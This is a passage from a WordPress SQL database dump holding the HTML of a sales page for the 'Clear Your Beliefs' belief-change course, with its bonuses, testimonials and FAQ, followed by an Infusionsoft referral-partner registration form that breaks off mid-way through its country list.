src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="174" height="199" /></a>We all want love, but something keeps getting in the way. The partner we’ve got isn’t quite right for us, or the one we want isn’t available. What’s going on?In this Bonus Interview, Lion talks with Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, creator of the True Self Way, President of Luminary Leadership Institute, and teacher of <em>Confused About Love? How to Create a Secure and Passionate Relationship.\r\n</em>(Carista is also known as <em>Lion''s Fiance''</em>)\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Carista will share her latest research on childhood attachment, and how our early bonding patterns with our parents play out – again and again – in our adult relationships. “We’re confused about what love is, and how to love. We can’t seem to get out of those repeated loops where we hurt each other. The answers are all right here, in our neurology, our earliest programming, and our beliefs about love and how to get it.”</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Learn how to determine your own (and your partner’s) attachment style, and practical techniques for healing old wounds and bringing passion and security back into your relationship.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body"><strong>Carista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, individuals and organizations. She developed a comprehensive holistic parenting methodology, described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and it will show you where you are on each spectrum.</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting with Beliefs Guest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\nWe’ve all heard about affirmations and the Law of Attraction. Why don’t they work? There’s a very specific reason, and you’ll learn what it is in this bonus interview with internationally acclaimed author and teacher Anodea Judith.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg"><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" /></a>is considered one of the world’s experts on the chakras. Her ten books have sold more than 500,000 copies worldwide.\r\n\r\nIn this informative conversation, Lion and Anodea discuss their book, <em>Creating On Purpose</em>, a step-by-step manual for turning your dreams into reality.\r\n\r\nBeliefs are at the core of the manifestation process, and the BeliefCloset Process was originally developed for their “<em>Creation is Ecstasy,</em>” workshop, which they taught internationally to great acclaim.\r\n\r\n</div>\r\n<div class="module_body">The book can be used to move any idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D.\r\n\r\nis the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\nYou''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<div class="icons">\r\n<div class="icon_box">\r\n<div class="icon a1"></div>\r\n<strong>Seven 90-Minute Class Sessions with Lion Goodman</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies – from the comfort of your own home. Each class session helps you learn the specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<div class="icon_box">\r\n<div class="icon a3"></div>\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes and two bonus calls. You can review, print and highlight the most important insights and practices.\r\n\r\n</div>\r\n</div>\r\n<h1>Plus... the <em>Clear Your Beliefs BONUS Collection</em></h1>\r\n<ul>\r\n	<li><em>What Makes Love So Confusing?</em> – Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>The Spiritual Technology of Manifesting with Beliefs</em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <em>The LoveStyle Profile Quiz</em></li>\r\n	<li><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-17 14:21:53', '2014-06-17 19:21:53', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(928, 4194, '2014-06-17 14:28:39', '2014-06-17 19:28:39', '<h1 style="text-align: center;"><span style="color: #000080;"><strong>Click here if you are a Certified Clear Your Beliefs Coach</strong></span></h1>\r\n<div class="icon_box style=">\r\n\r\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01">// <![CDATA[\r\n\r\n// ]]></script>\r\n\r\n\r\n<form accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/3f71c00a94d36f3139b9a849b793215b" class="infusion-form" id="inf_form_3f71c00a94d36f3139b9a849b793215b" method="POST">\r\n    \r\n	<div id="mainContent" class="simple beta-base beta-font-b" style="height: 100%;">\r\n	<input name="inf_form_xid" type="hidden" value="3f71c00a94d36f3139b9a849b793215b" /><input name="inf_form_name" type="hidden" value="CYB Referall Partner Registration" /><input name="infusionsoft_version" type="hidden" value="1.68.0.179" />\r\n    \r\n	<div>\r\n        <div class="authoring-image image-snippet" contentid="image">\r\n                    <div class="authoring-image image-snippet" contentid="image">\r\n                        <div class="imageSnippet-alignDiv">\r\n                            <img align="bottom" alt="Interesting Image" border="0" class="simage" height="142" src="https://d1yoaun8syyxxt.cloudfront.net/beliefcloset-d0c3a1d5-c389-4ad8-a263-5ef7f9a5dff9-v2" title="Interesting Image" width="585" />\r\n                        </div>\r\n                    </div>\r\n        </div>\r\n    </div>\r\n	\r\n    <div>\r\n        <div class="text">\r\n                    <div class="text paragraph" content id="paragraph">\r\n                        <div>\r\n                            \r\n                            <div>\r\n                                <span>\r\n                                    <strong>\r\n                                    <span>Referral Partner Registration </span>\r\n                                    </strong>\r\n                                </span>\r\n                            </div>\r\n                        </div>\r\n                    </div>\r\n        </div>\r\n    </div>\r\n    <div class="infusion-field">\r\n        <label for="inf_field_FirstName">First Name *</label>\r\n        <input class="infusion-field-input-container" id="inf_field_FirstName" name="inf_field_FirstName" placeholder="First Name *" type="text" />\r\n    </div>\r\n    <div class="infusion-field">\r\n        <label for="inf_field_LastName">Last Name *</label>\r\n        <input class="infusion-field-input-container" id="inf_field_LastName" name="inf_field_LastName" placeholder="Last Name *" type="text" />\r\n    </div>\r\n    <div class="infusion-field">\r\n        <label for="inf_field_Email">Email *</label>\r\n        <input class="infusion-field-input-container" id="inf_field_Email" name="inf_field_Email" placeholder="Email *" type="text" />\r\n    </div>\r\n    <div>\r\n        <div>&nbsp;</div>\r\n    </div>\r\n    <div>\r\n        <div>\r\n            <div> </div>\r\n            <div> </div>\r\n        </div>\r\n    </div>\r\n    <div>\r\n        <div>&nbsp;</div>\r\n    </div>\r\n    <div class="infusion-field">\r\n        <label for="inf_field_Company">Company</label>\r\n        <input class="infusion-field-input-container" id="inf_field_Company" name="inf_field_Company" placeholder="Company" type="text" />\r\n    </div>\r\n    <div class="infusion-field">\r\n        <label for="inf_field_Phone1">Phone Number *</label>\r\n        <input class="infusion-field-input-container" id="inf_field_Phone1" name="inf_field_Phone1" placeholder="Phone Number *" type="text" />\r\n    </div>\r\n    <div class="infusion-field">\r\n        <label for="inf_field_StreetAddress1">Street Address 1 *</label>\r\n        <input class="infusion-field-input-container" id="inf_field_StreetAddress1" name="inf_field_StreetAddress1" placeholder="Street Address 1 *" type="text" />\r\n    </div>\r\n    <div class="infusion-field">\r\n        <label for="inf_field_StreetAddress2"> Street Address 2</label>\r\n        <input class="infusion-field-input-container" id="inf_field_StreetAddress2" name="inf_field_StreetAddress2" placeholder=" Street Address 2" type="text" />\r\n    </div>\r\n    <div class="infusion-field">\r\n        <label for="inf_field_City"> City *</label>\r\n        <input class="infusion-field-input-container" id="inf_field_City" name="inf_field_City" placeholder=" City *" type="text" />\r\n    </div>\r\n    <div class="infusion-field">\r\n        <label for="inf_field_State">State *</label>\r\n        <input class="infusion-field-input-container" id="inf_field_State" name="inf_field_State" placeholder="State *" type="text" />\r\n    </div>\r\n    <div class="infusion-field">\r\n        <label for="inf_field_PostalCode"> Postal Code *</label>\r\n        <input class="infusion-field-input-container" id="inf_field_PostalCode" name="inf_field_PostalCode" placeholder=" Postal Code *" type="text" />\r\n    </div>\r\n    <div class="infusion-field">\r\n        <label for="inf_field_Country">Country *</label><div class="infusion-field-input-container"><select id="inf_field_Country" name="inf_field_Country"><option value="">Please select one</option><option value="Afghanistan">Afghanistan</option><option value="Åland Islands">Åland Islands</option><option value="Albania">Albania</option><option value="Algeria">Algeria</option><option value="American Samoa">American Samoa</option><option value="Andorra">Andorra</option><option value="Angola">Angola</option><option value="Anguilla">Anguilla</option><option value="Antarctica">Antarctica</option><option value="Antigua and Barbuda">Antigua and Barbuda</option><option value="Argentina">Argentina</option><option value="Armenia">Armenia</option><option value="Aruba">Aruba</option><option value="Australia">Australia</option><option value="Austria">Austria</option><option value="Azerbaijan">Azerbaijan</option><option value="Bahamas (the)">Bahamas (the)</option><option value="Bahrain">Bahrain</option><option value="Bangladesh">Bangladesh</option><option value="Barbados">Barbados</option><option value="Belarus">Belarus</option><option value="Belgium">Belgium</option><option value="Belize">Belize</option><option value="Benin">Benin</option><option value="Bermuda">Bermuda</option><option value="Bhutan">Bhutan</option><option value="Bolivia (Plurinational State of)">Bolivia (Plurinational State of)</option><option value="Bonaire, Sint Eustatius and Saba">Bonaire, Sint Eustatius and Saba</option><option value="Bosnia and Herzegovina">Bosnia and Herzegovina</option><option value="Botswana">Botswana</option><option value="Bouvet Island">Bouvet Island</option><option value="Brazil">Brazil</option><option value="British Indian Ocean Territory (the)">British Indian Ocean Territory (the)</option><option value="Brunei Darussalam">Brunei Darussalam</option><option value="Bulgaria">Bulgaria</option><option value="Burkina Faso">Burkina Faso</option><option value="Burundi">Burundi</option><option value="Cabo Verde">Cabo Verde</option><option value="Cambodia">Cambodia</option><option value="Cameroon">Cameroon</option><option value="Canada">Canada</option><option value="Cayman Islands (the)">Cayman Islands (the)</option><option value="Central African Republic (the)">Central African Republic (the)</option><option value="Chad">Chad</option><option value="Chile">Chile</option><option value="China">China</option><option value="Christmas Island">Christmas Island</option><option value="Cocos (Keeling) Islands (the)">Cocos (Keeling) Islands (the)</option><option value="Colombia">Colombia</option><option value="Comoros (the)">Comoros (the)</option><option value="Congo (the Democratic Republic of the)">Congo (the Democratic Republic of the)</option><option value="Congo (the)">Congo (the)</option><option value="Cook Islands (the)">Cook Islands (the)</option><option value="Costa Rica">Costa Rica</option><option value="Côte d''Ivoire">Côte d''Ivoire</option><option value="Croatia">Croatia</option><option value="Cuba">Cuba</option><option value="Curaçao">Curaçao</option><option value="Cyprus">Cyprus</option><option value="Czech Republic (the)">Czech Republic (the)</option><option value="Denmark">Denmark</option><option value="Djibouti">Djibouti</option><option value="Dominica">Dominica</option><option value="Dominican Republic (the)">Dominican Republic (the)</option><option value="Ecuador">Ecuador</option><option value="Egypt">Egypt</option><option value="El Salvador">El Salvador</option><option value="Equatorial Guinea">Equatorial Guinea</option><option value="Eritrea">Eritrea</option><option value="Estonia">Estonia</option><option value="Ethiopia">Ethiopia</option><option value="Falkland Islands (the) [Malvinas]">Falkland Islands (the) [Malvinas]</option><option value="Faroe Islands (the)">Faroe Islands (the)</option><option value="Fiji">Fiji</option><option value="Finland">Finland</option><option value="France">France</option><option value="French Guiana">French Guiana</option><option value="French Polynesia">French Polynesia</option><option value="French Southern Territories (the)">French Southern Territories (the)</option><option value="Gabon">Gabon</option><option value="Gambia (the)">Gambia (the)</option><option value="Georgia">Georgia</option><option value="Germany">Germany</option><option value="Ghana">Ghana</option><option value="Gibraltar">Gibraltar</option><option 